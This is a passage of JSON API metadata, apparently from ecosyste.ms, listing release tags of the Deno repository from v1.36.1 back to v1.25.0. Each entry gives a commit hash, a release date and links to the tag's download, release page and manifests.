.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno